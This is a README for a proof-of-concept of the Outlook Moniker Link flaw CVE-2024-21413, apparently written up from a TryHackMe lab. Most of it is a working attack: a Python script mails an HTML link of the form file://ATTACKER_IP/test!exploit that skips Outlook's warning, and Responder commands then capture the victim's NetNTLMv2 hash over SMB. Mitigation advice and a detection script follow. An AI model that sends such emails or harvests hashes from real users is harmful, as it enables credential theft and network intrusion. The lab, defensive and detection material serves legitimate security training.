POC details: 48af2c933a2f1be79e5a7a6e0c87a7195e1c7a72

Related vulnerability
Title: Microsoft Outlook security vulnerability (CVE-2024-21413)
Description: Microsoft Outlook is an email application from Microsoft Corporation (USA). Microsoft Outlook contains a security vulnerability. The following products and versions are affected: Microsoft Office 2019 for 32-bit editions, Microsoft Office 2019 for 64-bit editions, Microsoft 365 Apps for Enterprise for 32-bit Systems, Microsoft 365 Apps for Enterprise
Introduction
# Email exploit Moniker Link-CVE-2024-21413-Module — Documentation

**Overview:** A practical PoC demonstrating how a Moniker Link (a `file://` hyperlink whose UNC path has `!` and arbitrary text appended) in an HTML email makes Outlook skip its hyperlink security prompt and open an SMB connection to an attacker-controlled host as soon as the victim clicks it, leaking the victim's NetNTLMv2 response to Responder. This showcases practical skills in penetration testing, scripting, and network protocol analysis.

---

## Key Skills Demonstrated

* Python scripting for automated email delivery
* Understanding of SMB, NTLMv2, LLMNR, NBT-NS and mDNS protocols
* Responder configuration and monitoring for hash capture
* Troubleshooting Linux network/DNS configuration issues
* Crafting a controlled offensive security scenario in a lab environment

---

## PoC Workflow

1. **Set up the SMB listener:** Start Responder on the attack machine so it answers SMB connections and logs every NTLM authentication attempt.
2. **Send the crafted email:** Use a Python script to deliver an HTML email whose hyperlink is a Moniker Link: a `file://` UNC path to the attacker's SMB share with `!` and arbitrary text appended (`file://ATTACKER_IP/test!exploit`).
3. **Capture the hash:** When the victim clicks the link, the `!` makes Outlook skip the security prompt it normally shows for `file://` links and open the path over SMB; the Windows client authenticates with the user's NTLM credentials and Responder records the NetNTLMv2 response (the "hash") for offline cracking or relay.

---

## Minimal Exploit Script

```python
# exploit.py (trimmed)
import getpass
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formataddr

sender = 'attacker@monikerlink.thm'
receiver = 'victim@monikerlink.thm'
mailserver = '10.201.52.124'  # THM SMTP server
password = getpass.getpass('Enter attacker email password: ')

# The "!" after the UNC path is the bug: Outlook treats the link as a
# composite moniker and skips the security prompt it would otherwise show
# for a file:// link, then authenticates to ATTACKER_IP over SMB when the
# link is clicked. The text after "!" can be anything.
html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'

msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))

# Plain SMTP with AUTH on port 25, which the lab mail server allows;
# add s.starttls() before s.login() against a server that supports it.
with smtplib.SMTP(mailserver, 25) as s:
    s.ehlo()
    s.login(sender, password)
    s.sendmail(sender, [receiver], msg.as_string())
    print('Email delivered')
```

*Tip:* Replace `ATTACKER_IP` with the address Responder is listening on and `mailserver` with your SMTP relay before running. In the TryHackMe lab, the password is `attacker`.

---

## Running Responder

```bash
sudo responder -I ens5
```

*Replace `ens5` with the interface that faces the victim. Responder needs root to bind SMB (445) and the other services it poisons, and prints each captured response under `[SMB] NTLMv2-SSP Hash`.*

---

## Troubleshooting `/etc/resolv.conf`

Sometimes Responder fails to start because `/etc/resolv.conf` is a dangling symlink (common on cloud VM images that manage the resolver elsewhere). Replace it with a regular file; this needs root and is a lab-only fix, since it bypasses whatever was managing the resolver:

```bash
rm -f /etc/resolv.conf
printf 'nameserver 8.8.8.8\nnameserver 1.1.1.1\n' > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
```

*Skills highlighted:* Linux troubleshooting, DNS configuration, and adapting tools to cloud/VM environments.

---

## Progress Screenshots

1. **Error / Resolv.conf Issue**:
   ![Error Resolv.conf](Email%20exploit/error%20resolv.conf.PNG)

2. **DNS Fix Applied**: 
   ![DNS Setup Fix](Email%20exploit/dns%20setup%20fix.PNG)

3. **Python Email Script**:
   ![Python Email Script](Email%20exploit/python%20email%20script.PNG)

4. **Exploit Delivery**:
   ![Exploit Delivery](Email%20exploit/exploit%20delivery.PNG)

5. **Victim Inbox**:
   ![Victim Email](Email%20exploit/victime%20email.PNG)

6. **Captured Victim Hash**: 
   ![Captured Victim Hash](Email%20exploit/Victime%20hash.PNG)

---

## Tools & Commands Used

* **Responder**: SMB/LLMNR/NBT-NS/mDNS listener and poisoner
* **Python3**: PoC email script execution
* **smtplib / email.mime**: Python libraries for crafting and sending emails
* Linux shell commands for DNS troubleshooting

---

## Skills Learned / Portfolio Highlight

* Network attack simulation and exploitation workflow
* Automation of a social-engineering vector (Moniker Link email)
* Capturing and analyzing NetNTLMv2 hashes
* Cross-discipline troubleshooting: Python, networking, Windows and Linux interaction
* Documentation and workflow presentation for technical reviewers

---

## Mitigation & Defensive Notes

* Apply Microsoft's February 2024 security update for Office/Outlook, which fixes CVE-2024-21413; on unpatched clients the hyperlink warning is bypassed as soon as the user clicks.
* Block outbound SMB (TCP 445) to untrusted networks at the perimeter, and keep in mind that Windows falls back to WebDAV (TCP 80) through the WebClient service when 445 is blocked.
* Restrict outgoing NTLM with the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy where Kerberos suffices. SMB signing only stops relay; it does not prevent offline cracking of a captured NetNTLMv2 response, so pair it with long passwords.
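On the detection side, the link itself is a reliable indicator: a `file:` hyperlink whose path contains `!` has no legitimate use in email. The checker below is an added example written for this page, not code from the original PoC or from any mail product; it parses a raw RFC 5322 message, collects every `<a href>` from its HTML parts and flags Moniker-Link-shaped targets. The messages it runs on are constructed inline by `build_sample`, and the host names and addresses in them are placeholders.

```python
# Added example: flag MonikerLink-style hyperlinks in the HTML part of an
# email. Not part of the original PoC; the sample messages are constructed.
import email
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser

# A file: URL (any mix of slashes / backslashes before the host) whose path
# contains "!". The "!" is the composite-moniker separator that makes Outlook
# skip its hyperlink security prompt (CVE-2024-21413). An entity-encoded "!"
# (&#33;) is already decoded by HTMLParser when it reads the attribute.
MONIKER_RE = re.compile(r"^file:[/\\]*(?P<host>[^/\\]+)[/\\].*!", re.IGNORECASE)


class _HrefCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value.strip())


def html_hrefs(raw: bytes) -> list:
    """Every <a href> in every text/html part of a raw message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hrefs = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            collector = _HrefCollector()
            collector.feed(part.get_content())   # decodes QP/base64 and charset
            hrefs.extend(collector.hrefs)
    return hrefs


def find_moniker_links(raw: bytes) -> list:
    """Return [{'href': ..., 'host': ...}] for each suspicious link."""
    hits = []
    for href in html_hrefs(raw):
        m = MONIKER_RE.match(href)
        if m:
            hits.append({"href": href, "host": m.group("host")})
    return hits


def build_sample(href: str) -> bytes:
    """Constructed multipart/alternative message carrying one link (test input)."""
    msg = EmailMessage()
    msg["From"] = "attacker@example.test"
    msg["To"] = "victim@example.test"
    msg["Subject"] = "Quarterly report"
    msg.set_content("Please open the attached report.")
    msg.add_alternative(f'<p>Please <a href="{href}">open the report</a>.</p>', subtype="html")
    return msg.as_bytes()


if __name__ == "__main__":
    for href in ("file://10.0.0.5/test!exploit",
                 "file:///\\\\10.0.0.5\\share\\report.rtf!x",
                 "file://10.0.0.5/test&#33;exploit",
                 "file://10.0.0.5/share/report.docx",
                 "https://example.test/a!b"):
        print(href, "->", find_moniker_links(build_sample(href)))
```

Feeding the decoded part body to an HTML parser rather than grepping the raw message matters: the exploit link survives quoted-printable wrapping and HTML entity encoding, both of which defeat a naive `file://.*!` regex on the wire bytes. A plain `file://` link without `!` is left alone here because Outlook still prompts for it; treat it as low-severity rather than a MonikerLink hit.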

---

## Attribution

Adapted from TryHackMe MonikerLink lab and original PoC by CMNatic ([GitHub](https://github.com/cmnatic))
File snapshot

```text
[4.0K] /data/pocs/48af2c933a2f1be79e5a7a6e0c87a7195e1c7a72
├── [4.0K] Email exploit
│   ├── [190K] dns setup fix.PNG
│   ├── [284K] error resolv.conf.PNG
│   ├── [134K] exploit delivery.PNG
│   ├── [298K] python email script.PNG
│   ├── [227K] victime email.PNG
│   └── [415K] Victime hash.PNG
└── [3.9K] README.md

1 directory, 7 files
```